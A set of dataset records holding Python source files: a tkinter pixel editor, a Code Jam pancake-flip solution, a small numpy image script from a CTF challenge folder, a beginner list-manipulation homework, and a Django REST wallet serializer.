highlightbackground=config['add_duplicate_frame_color']).pack(side=tk.RIGHT)\n header_section3.pack()\n\n buttons = []\n matrix_section = tk.Frame(app)\n for i in range(0, fm.rows):\n row_of_buttons = []\n for j in range(0, fm.columns):\n frame = tk.Frame(matrix_section, width=config['pixel_size'], height=config['pixel_size'])\n button = tk.Button(frame, command=sm.handle_pixel_click(i, j))\n button.grid(sticky=\"wens\")\n frame.grid_propagate(False) #disables resizing of frame\n frame.columnconfigure(0, weight=1) #enables button to fill frame\n frame.rowconfigure(0,weight=1) #any positive number would do the trick\n frame.grid(row=i, column=j) #put frame where the button should be\n row_of_buttons.append(button)\n buttons.append(row_of_buttons)\n matrix_section.pack()\n sm.set_pixel_buttons(buttons)\n\n footer_section = tk.Frame(app)\n for i, nav_size in enumerate(sorted(config['nav_sizes'], reverse=True)):\n button_color = config['contrast_dark'] if (i % 2 == 0) else config['contrast_light']\n tk.Button(footer_section, text='-{0}'.format(nav_size), command=sm.handle_page_change(-nav_size), highlightbackground=button_color).pack(side=tk.LEFT)\n tk.Button(footer_section, text='+{0}'.format(nav_size), command=sm.handle_page_change(nav_size), highlightbackground=button_color).pack(side=tk.RIGHT)\n tk.Label(footer_section, textvariable=sm.current_page).pack(side=tk.BOTTOM)\n footer_section.pack()\n\n app.mainloop()\n","repo_name":"cheng-lincoln/pixel-editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543180241","text":"#!/usr/bin/env python\nfrom sys import stdin\n\n\ndef process():\n line = stdin.readline().split(\" \")\n S = list(line[0])\n K = int(line[1])\n flips = 0\n for i in range(len(S) - K + 1):\n if S[i] == '-':\n flips += 1\n for j in range(i, i + K):\n S[j] = '+' if S[j] == '-' else '-'\n if '-' in S:\n return \"IMPOSSIBLE\"\n else:\n return flips\n\ndef main():\n N = int(stdin.readline())\n for i in range(N):\n print(\"Case #{}: {}\".format(i + 1, process()))\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2350.py","file_name":"2350.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1592820597","text":"#image to matrix\nfrom PIL import Image\nimport numpy as np\n\n# the identity 3d tensor\naidi = np.zeros((225, 3, 3), dtype=np.uint8)\nfor i in range(0, 225):\n aidi[i] = np.identity(3)\n\n# ar = np.matmul(ar, aidi)\n# np.set_printoptions(threshold=sys.maxsize)\n# print(ar)\n# print(aidi)\n\n#save matrix to image\ndat = Image.fromarray(aidi)\ndat.save('solve.png')\ndat.show()","repo_name":"CTF-Find-IT-2023/CTF-Find-IT-2023-Chall","sub_path":"challenge-unreleased/Web/Image Multiplier/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"20550673604","text":"# 2)\tДаны 2 списка: a = [4,6,'pу','tell',78] b = [44,'hello’,56,'exept’,3]\n# Выполнить следующие операции:\n# 1)Сложить два списка.\n# 2) Добавьте элемент 6 на 3 позицию.\n# 3)Удалите все текстовые переменные.\n# 4) Посчитайте количество элементов списка.\na = [4,6,'py','tell',78]\nb = [44,'hello',56,'exept',3]\nc = a + b\nprint(f\"Новый список после сложения {c}\")\nc.insert(2,6)\nprint(f\"Список после добавления элемента {c}\")\nlong_of_spisok = len(c)\nind = 0\nwhile long_of_spisok > 0:\n if type(c[ind]) == str:\n c.pop(ind)\n ind += 1\n long_of_spisok -= 1\nprint(f\"Список после удаления тeкстовых элементов {c}\")\nlong = len(c)\nprint(f\"Длинна списка {long} элементов\")\n# Не знаю, что не так с удалением строковых элементов","repo_name":"Janyasvetlovskiy/Evgeniy_Svetlovskiy_Homeworks1","sub_path":"homework_7/taks_2.py","file_name":"taks_2.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7521212004","text":"from rest_framework import serializers\n\nfrom wallet.models import BANK_BONUS_RUB, BANK_BONUS_USD_EUR, Wallet\n\n\nclass WalletSerializer(serializers.ModelSerializer):\n user = serializers.PrimaryKeyRelatedField(read_only=True)\n balance = serializers.DecimalField(max_digits=200, decimal_places=2, default=0, read_only=True)\n\n class Meta:\n model = Wallet\n fields = (\n \"id\",\n \"user\",\n \"name\",\n \"type\",\n \"currency\",\n \"balance\",\n \"created_on\",\n \"modified_on\",\n )\n\n def create(self, validated_data):\n \"\"\"\n Add default bonus from bank for each new created wallet:\n if wallet currency USD or EUR - balance=3.00,\n if RUB - balance=100.00\n \"\"\"\n\n if validated_data[\"currency\"] in [\"USD\", \"EUR\"]:\n balance = BANK_BONUS_USD_EUR\n elif validated_data[\"currency\"] == \"RUB\":\n balance = BANK_BONUS_RUB\n\n user = self.context[\"request\"].user\n\n return Wallet.objects.create(**validated_data,\n user=user,\n balance=balance)\n","repo_name":"Dm1triiSmirnov/drf_project2","sub_path":"wallet/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}